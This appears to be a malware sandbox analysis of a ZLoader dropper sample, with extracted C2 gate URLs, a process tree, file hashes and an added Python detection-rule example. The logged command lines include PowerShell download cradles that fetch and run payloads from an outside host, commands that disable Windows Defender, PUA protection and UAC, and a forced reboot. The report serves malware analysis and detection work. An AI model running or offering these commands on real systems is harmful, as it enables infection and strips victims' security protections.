Analysis
- max time kernel: 52s
- max time network: 120s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 16-08-2021 11:42
- Static task: static1
- Behavioral task: behavioral1
  Sample: 8f87fe90d589a4fa73cff6a242fe222b.exe
  Resource: win7v20210410
  Errors
General
- Target: 8f87fe90d589a4fa73cff6a242fe222b.exe
- Size: 165KB
- MD5: 8f87fe90d589a4fa73cff6a242fe222b
- SHA1: 381e33872d0f6f1a7233beeb6e9524435c2a9ab6
- SHA256: edaabcb2e82b51c9b8df54dc82afc494bff804b1b187c4657ab583e8ca0bd052
- SHA512: f0ce6885ac47429df5a1a0779c9a455300d77284ef71ff1e344afe2344513b430705ce50d62fceddb051cb5df8b67e1c4969b377413647f4cbe23fc87351aca0
Malware Config
Extracted
- Family: zloader
- Botnet: ivan
- Campaign: ivan
- C2:
  https://iqowijsdakm.com/gate.php
  https://wiewjdmkfjn.com/gate.php
  https://dksaoidiakjd.com/gate.php
  https://iweuiqjdakjd.com/gate.php
  https://yuidskadjna.com/gate.php
  https://olksmadnbdj.com/gate.php
  https://odsakmdfnbs.com/gate.php
  https://odsakjmdnhsaj.com/gate.php
  https://odjdnhsaj.com/gate.php
  https://odoishsaj.com/gate.php
Signatures
- Blocklisted process makes network request (1 IoC)
  flow 8 | PID 1772 | powershell.exe
- Downloads MZ/PE file
- Loads dropped DLL (1 IoC)
  PID 3892 | regsvr32.exe
- Adds Run key to start application (2 TTPs, 2 IoCs)
  Key created | \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce | 8f87fe90d589a4fa73cff6a242fe222b.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 \"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"" | 8f87fe90d589a4fa73cff6a242fe222b.exe
  Note: a RunOnce value named wextract_cleanupN that calls advpack.dll,DelNodeRunDLL32 is the cleanup stub written by the Windows IExpress/wextract self-extractor so that the IXP000.TMP extraction folder is deleted at next logon. It shows the sample is an IExpress SFX package (hence its first child is cmd /c start.bat); it does not persist the payload, so treat this signature as a dropper indicator rather than as persistence.
- Delays execution with timeout.exe (1 IoC)
  PID 3404 | timeout.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  PID 1772 | powershell.exe (3 events)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Token: SeDebugPrivilege | PID 1772 | powershell.exe
- Suspicious use of WriteProcessMemory (9 IoCs)
  PID 3164 (8f87fe90d589a4fa73cff6a242fe222b.exe) wrote to memory of PID 2192 (cmd.exe), 2 events
  PID 2192 (cmd.exe) wrote to memory of PID 1772 (powershell.exe), 2 events
  PID 2192 (cmd.exe) wrote to memory of PID 1936 (regsvr32.exe), 2 events
  PID 1936 (regsvr32.exe) wrote to memory of PID 3892 (regsvr32.exe), 3 events
  Note: every pair here is a parent writing into a child it has just created, which the sandbox logs for ordinary process creation as well; none of these writes is by itself evidence of injection into an unrelated process.
Processes
- [1] C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe (PID 3164)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe"
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  - [2] C:\Windows\SYSTEM32\cmd.exe (PID 2192)
    cmdline: cmd /c start.bat
    - Suspicious use of WriteProcessMemory
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1772)
      cmdline: powershell Invoke-WebRequest https://pornotublovers.com/JavaP.dll -OutFile JavaP.dll
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - [3] C:\Windows\system32\regsvr32.exe (PID 1936)
      cmdline: regsvr32 JavaP.dll
      - Suspicious use of WriteProcessMemory
      - [4] C:\Windows\SysWOW64\regsvr32.exe (PID 3892)
        cmdline: JavaP.dll
        - Loads dropped DLL
        - [5] C:\Windows\SysWOW64\msiexec.exe (PID 2876)
          cmdline: msiexec.exe
    - [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2072)
      cmdline: powershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat
    - [3] C:\Windows\system32\cmd.exe (PID 2548)
      cmdline: cmd /c nsudo.bat
      - [4] C:\Windows\system32\cacls.exe (PID 340)
        cmdline: "C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 2768)
        cmdline: powershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe
      - [4] C:\Users\Admin\AppData\Roaming\javase.exe (PID 2128)
        cmdline: javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f
      - [4] C:\Users\Admin\AppData\Roaming\javase.exe (PID 3700)
        cmdline: javase -U:T sc config WinDefend start= disabled
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3952)
        cmdline: powershell Invoke-WebRequest https://pornotublovers.com/autorun100.bat -OutFile autorun100.bat
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 1052)
        cmdline: powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force
      - [4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3588)
        cmdline: powershell.exe -command "Set-MpPreference -PUAProtection disable"
      - [4] C:\Windows\system32\shutdown.exe (PID 3252)
        cmdline: shutdown.exe /r /f /t 00
    - [3] C:\Windows\system32\timeout.exe (PID 3404)
      cmdline: timeout 16
      - Delays execution with timeout.exe
- [1] C:\Windows\system32\LogonUI.exe (PID 3868)
  cmdline: "LogonUI.exe" /flags:0x0 /state0:0xa3acd855 /state1:0x41c64e6d

Notes on the tree
- The 64-bit regsvr32 (PID 1936) relaunches the SysWOW64 regsvr32 (PID 3892) to register JavaP.dll, which is what happens when a 32-bit DLL is passed to the 64-bit regsvr32. The msiexec.exe child (PID 2876) of the 32-bit regsvr32 matches ZLoader's known practice of injecting its payload into msiexec.exe.
- cacls.exe against C:\Windows\system32\config\system is a common batch-script elevation check: the command fails unless the script already runs with administrative rights.
- javase.exe is invoked with -U:T, the NSudo switch for running a command as TrustedInstaller, consistent with the downloading script being named nsudo.bat. Under that token the script suppresses Defender notifications, disables the WinDefend service, turns off PUA protection and sets EnableLUA to 0 (UAC off), then forces an immediate reboot.
- autorun100.bat is downloaded but its execution is not captured in this tree. The forced reboot ends the recorded run, which is why LogonUI.exe appears at top level and the kernel time is only 52s.
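The following Python is an added example and not part of the sandbox output. It runs a small set of detection rules over the process and registry events transcribed from the tree above and from the "Adds Run key" signature: PowerShell download cradles, regsvr32 loading a DLL from outside the system directories, regsvr32 spawning msiexec.exe, Defender and UAC tampering, the cacls elevation check, the NSudo -U:T switch, a forced reboot, and the RunOnce entry, which it classifies as an IExpress cleanup stub rather than persistence. PIDs, images and command lines are the ones the report logs; the rule names, regular expressions and verdict labels are this example's own choices, and the inference that -U:T is NSudo is drawn from the script name nsudo.bat.

```python
"""Detection rules run over the process tree and registry IoC of this report.

Added example, not part of the sandbox output. EVENTS is transcribed from the
report's process tree and 'Adds Run key' signature; rule names, patterns and
verdict labels are this example's own choices.
"""
import re
from dataclasses import dataclass


@dataclass
class Event:
    pid: int
    image: str              # process image path as logged
    cmdline: str = ""       # command line as logged ("" for registry events)
    parent_image: str = ""  # image of the creating process (from tree depth)
    reg_key: str = ""       # set only for registry set-value events
    reg_value: str = ""


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\system32\cmd.exe"
DROPPER = r"C:\Users\Admin\AppData\Local\Temp\8f87fe90d589a4fa73cff6a242fe222b.exe"
JAVASE = r"C:\Users\Admin\AppData\Roaming\javase.exe"

EVENTS = [  # PIDs and command lines as logged in the report
    Event(3164, DROPPER, f'"{DROPPER}"'),
    Event(3164, DROPPER, reg_key=r"\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0",
          reg_value=r'rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\"'),
    Event(2192, CMD, "cmd /c start.bat", DROPPER),
    Event(1772, PS, "powershell Invoke-WebRequest https://pornotublovers.com/JavaP.dll -OutFile JavaP.dll", CMD),
    Event(1936, r"C:\Windows\system32\regsvr32.exe", "regsvr32 JavaP.dll", CMD),
    Event(3892, r"C:\Windows\SysWOW64\regsvr32.exe", "JavaP.dll", r"C:\Windows\system32\regsvr32.exe"),
    Event(2876, r"C:\Windows\SysWOW64\msiexec.exe", "msiexec.exe", r"C:\Windows\SysWOW64\regsvr32.exe"),
    Event(2072, PS, "powershell Invoke-WebRequest https://pornotublovers.com/nsudo.bat -OutFile nsudo.bat", CMD),
    Event(2548, CMD, "cmd /c nsudo.bat", CMD),
    Event(340, r"C:\Windows\system32\cacls.exe", r'"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"', CMD),
    Event(2768, PS, "powershell Invoke-WebRequest https://pornotublovers.com/javase.exe -OutFile javase.exe", CMD),
    Event(2128, JAVASE, r'javase -U:T reg add "HKLM\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d "1" /f', CMD),
    Event(3700, JAVASE, "javase -U:T sc config WinDefend start= disabled", CMD),
    Event(3952, PS, "powershell Invoke-WebRequest https://pornotublovers.com/autorun100.bat -OutFile autorun100.bat", CMD),
    Event(1052, PS, r"powershell.exe New-ItemProperty -Path HKLM:Software\Microsoft\Windows\CurrentVersion\policies\system -Name EnableLUA -PropertyType DWord -Value 0 -Force", CMD),
    Event(3588, PS, 'powershell.exe -command "Set-MpPreference -PUAProtection disable"', CMD),
    Event(3252, r"C:\Windows\system32\shutdown.exe", "shutdown.exe /r /f /t 00", CMD),
    Event(3404, r"C:\Windows\system32\timeout.exe", "timeout 16", CMD),
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
RUNONCE = "\\currentversion\\runonce\\"
IEXPRESS_STUB = re.compile(r"advpack\.dll,DelNodeRunDLL32", re.I)
DEFENDER_TAMPER = [
    re.compile(r"\bsc\s+config\s+windefend\s+start=\s*disabled", re.I),
    re.compile(r"set-mppreference\b.*\bdisable", re.I),
    re.compile(r"windows defender\\ux configuration.*notification_suppress", re.I),
]


def _is(e, name):
    return e.image.lower().endswith("\\" + name)

def download_cradle(e):  # PowerShell fetching a file to disk
    return _is(e, "powershell.exe") and bool(re.search(r"invoke-webrequest\b.*-outfile\b", e.cmdline, re.I))

def regsvr32_nonsystem_dll(e):  # DLL given by bare name or from a user-writable path
    m = _is(e, "regsvr32.exe") and re.search(r"(\S+\.dll)\b", e.cmdline, re.I)
    return bool(m) and not m.group(1).lower().startswith(SYSTEM_DIRS)

def regsvr32_spawns_msiexec(e):  # msiexec.exe is ZLoader's known injection target
    return _is(e, "msiexec.exe") and e.parent_image.lower().endswith("\\regsvr32.exe")

def defender_tamper(e):
    return any(p.search(e.cmdline) for p in DEFENDER_TAMPER)

def uac_disabled(e):  # EnableLUA=0 via PowerShell (-Value 0) or reg add (/d 0)
    return bool(re.search(r'\benablelua\b.*(?:-value\s+|/d\s+"?)0\b', e.cmdline, re.I))

def forced_reboot(e):
    return bool(re.search(r"\bshutdown(\.exe)?\s.*[/-]r\b.*[/-]f\b", e.cmdline, re.I))

def admin_check_cacls(e):  # cacls on config\system fails unless elevated: a batch-script admin test
    return bool(re.search(r"\bcacls(\.exe)?\b.*config\\system\b", e.cmdline, re.I))

def trustedinstaller_switch(e):  # -U:T is NSudo's run-as-TrustedInstaller switch (inferred from nsudo.bat)
    return bool(re.search(r"(?:^|\s)-U:T\b", e.cmdline))

def iexpress_cleanup_runonce(e):  # wextract SFX cleanup stub (deletes IXP000.TMP at logon), not persistence
    return RUNONCE in e.reg_key.lower() and bool(IEXPRESS_STUB.search(e.reg_value))

def runonce_persistence(e):  # any other RunOnce value is a genuine autostart entry
    return RUNONCE in e.reg_key.lower() and not IEXPRESS_STUB.search(e.reg_value)

RULES = [download_cradle, regsvr32_nonsystem_dll, regsvr32_spawns_msiexec, defender_tamper, uac_disabled,
         forced_reboot, admin_check_cacls, trustedinstaller_switch, iexpress_cleanup_runonce, runonce_persistence]

def scan(events):
    """(pid, rule name) for every rule each event trips."""
    return [(e.pid, r.__name__) for e in events for r in RULES if r(e)]

def summarize(hits):
    """rule name -> sorted unique PIDs."""
    out = {}
    for pid, name in hits:
        out.setdefault(name, set()).add(pid)
    return {k: sorted(v) for k, v in sorted(out.items())}

if __name__ == "__main__":
    for rule, pids in summarize(scan(EVENTS)).items():
        print(f"{rule:26s} {pids}")
```

Run stand-alone it prints one line per rule with the PIDs that tripped it. The RunOnce split is the part worth copying into real detections: a RunOnce value is only reported as persistence when it is not the advpack.dll,DelNodeRunDLL32 cleanup stub, which keeps every IExpress-packaged installer from showing up as an autostart finding while still catching a payload that writes its own RunOnce entry.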
Network
MITRE ATT&CK Enterprise v6
Downloads
- 1
  MD5: 56efdb5a0f10b5eece165de4f8c9d799
  SHA1: fa5de7ca343b018c3bfeab692545eb544c244e16
  SHA256: 6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108
  SHA512: 91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc
- 2
  MD5: c9a869799efa0f9da58092ac82fc5cf4
  SHA1: 8158751848f8806ce9d35433802109858e32ea35
  SHA256: 85c922b298880c6c8ff1e33d0655971d09ddf3d130338958673c7e3799554df6
  SHA512: 76e2089aad3ae2c9fe895ca6895405b6351984104e6e972d78c78f8e88892527adccf52b8855daf37ebbf486a6e8086937e9bf982f88fd540b95bbc7ec081449
- 3
  MD5: 76a2faa51e5223c5fe52dea278682941
  SHA1: 1eef0fe778d6798a2871a8bb157e6ee6a53f7b56
  SHA256: 652d5d4b41cfdeaf0cdbf27b665f1c02177b6a36e326c3ed07b413e2b9127b4d
  SHA512: f29f92c3f1c379f63958fc94991e06df264636e59d25525adb86f986f7e3a04110233e41974c7ceeb18c174a2869d37d8e0eec86b5def50f9ee62dd43a1611bb
- 4
  MD5: 211b497e2692909e96e216b5e4934d76
  SHA1: fcaef00fefbde139fe9682c778b8475bf996dc6d
  SHA256: 8cfd11db0c8c1d78a2265ea869f9f0048bbfddb071ee67b03bbed7c056d7eabf
  SHA512: 8eddc4359341293578d6b0eb2d3fd4f229657185f809794c750c46c74bc4d8f0406727d8b9070035b7bda94bb99d8e04bd34b6dbea46fb8534b3ccf53186940e
- 5
  MD5: 6affe9382dfe0de4672fb122005c0880
  SHA1: d06df962c20edc629a88c5b9f8ffbbf0b59f4c22
  SHA256: 2cef36bd8e08adeaee9783308a8cc49266ed0d9097eb031a07a655a55beee305
  SHA512: 6cace93667f22417e4cc5e5d935df1aef131a587823095e464c06d582f95241f828bed640e2935640afd4bef03c51859d7e1007f83a2183c6499ba2ec3260147
- 6
  MD5: 8a0e43d8537b255b7fae4ddaca4b604c
  SHA1: 720c6951212c155b1c3d194dee2972fd15024358
  SHA256: 4cd7de3dad825292555ebf690964f5ca322ebb25dad79efc3282191f68c8f4f7
  SHA512: bf440490b89b0aa2e22c15eb737b1a9d716e3ba1b008b2ecd3802f2149cb1a7ef6203c475ce7eedde71622a66118fdfd857310eb8810f9fa941ec0577bb666bb
- 7
  MD5: 676d31dd4a8405ead757e0b72d6bd381
  SHA1: 789a5fc1af78a0630ae705f6dd5506dd476d9d0f
  SHA256: 57d69a6ca957beb5c9eed7f39d0bb56e6d3348bd510fbba10ad0c19438a712b7
  SHA512: 79cc7bd42feb80d9a552f2fd6145795ab1904ca7c8d4175f70f9225b04eddcc7107ebf4391eac9d578ed7b963ce192df58050e73b8eaed30e3ef89405e18028c
- 8
  MD5: 23cb9715b98c53a8351d0cfb3d0a24eb
  SHA1: 4048470f92c65898b3e7186cc98108b74e4b2171
  SHA256: bf74dac2db3967e1d661db1bfdbee8fe546bd19ecdcef0baf6b61fb3f78a89d7
  SHA512: 4b3753020e795b8ba96d292097633a837579aa3b5fa68f7b39f8d76ce3bf3cec6a43663526f9ae79283b4a9aa9034ab96605a554b035ff35f6e10a42bf3efdc1
- 9
  MD5: 5cae01aea8ed390ce9bec17b6c1237e4
  SHA1: 3a80a49efaac5d839400e4fb8f803243fb39a513
  SHA256: 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
  SHA512: c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
- 10 (same hashes as entry 9)
  MD5: 5cae01aea8ed390ce9bec17b6c1237e4
  SHA1: 3a80a49efaac5d839400e4fb8f803243fb39a513
  SHA256: 19896a23d7b054625c2f6b1ee1551a0da68ad25cddbb24510a3b74578418e618
  SHA512: c8e54c92133ba686238ea554c1cd82ba441db5fd4b0cbd5082d5eb4ddfcedd15506b9dac553459d0b2221c75778241f926ed3eef64571e4b1e0eb6f80ff9b481
- 11
  MD5: 6f10d512d4cbb527fd26ae266d0a4aef
  SHA1: 6e42d51ff2d42c5f999943b329a655e901ea4b32
  SHA256: b37efaf69f5484fd2e4ec9c83553b9788e39a10fc4390065c29d59f770f34943
  SHA512: 4f66e8435b8439ace551ad8a70483926891ff3f55b27688602b2e0c58999054bd430308879374f4e8c990a91c3e9cc9cd78b6d355d4370051528bce536e1028e
- 12 (same hashes as entry 8)
  MD5: 23cb9715b98c53a8351d0cfb3d0a24eb
  SHA1: 4048470f92c65898b3e7186cc98108b74e4b2171
  SHA256: bf74dac2db3967e1d661db1bfdbee8fe546bd19ecdcef0baf6b61fb3f78a89d7
  SHA512: 4b3753020e795b8ba96d292097633a837579aa3b5fa68f7b39f8d76ce3bf3cec6a43663526f9ae79283b4a9aa9034ab96605a554b035ff35f6e10a42bf3efdc1